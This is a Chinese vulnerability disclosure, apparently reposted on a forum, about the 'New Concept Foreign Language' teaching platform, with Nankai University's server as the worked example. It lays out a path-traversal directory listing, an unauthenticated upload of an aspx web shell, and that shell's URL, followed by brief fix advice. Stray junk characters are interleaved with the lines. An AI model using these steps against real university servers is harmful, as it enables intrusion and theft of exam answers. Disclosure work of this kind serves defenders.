新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
$ k$ a6 V, s0 k% C, ]0 I
5 J* ]2 _. f) a详细说明：
' M9 q) `0 P5 T
以南开大学的为例:
http://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
$ N& D! }. r$ i( G3 H8 v; d<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
. l7 [4 ?( i5 s及版本号
  d. a$ c2 T9 x1 e<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
& p- l5 b4 K6 q使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../
. \/ P1 U& Z# {6 q; A
, F7 L9 c$ R* ?* N, U  b1 k发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
% b0 V9 Q2 l3 G5 ]8 U/ b可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可

OOXX

! L. @$ V9 a7 A% e! X+ w! @$ GGoogle "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
* W8 x4 x! ]) J- t6 i: Q& s漏洞证明：
2 M, K/ H; Z8 S: O
4 X; ~% X/ R% B  v/ \列目录：
' I7 M7 W( r! s. s* X6 V9 N5 g4 Xhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
5 \3 g" D- D: ^# n文件上传：
0 p1 ]9 `+ }  ?* s7 S. Uhttp://222.30.60.3/npelsv/editor/editor.htm

2 O2 Z( H) j8 s  Q) O0 Z; q上传木马：
( y* _2 x8 M# \1 Vhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

' h/ @7 v% e5 d$ z- O& [6 D修复方案：
& j4 B; t8 f/ f4 n% w/ ~/ M$ p好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
& p: H) f5 B5 I2 A! |  s, G并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
  x4 |6 F. q0 D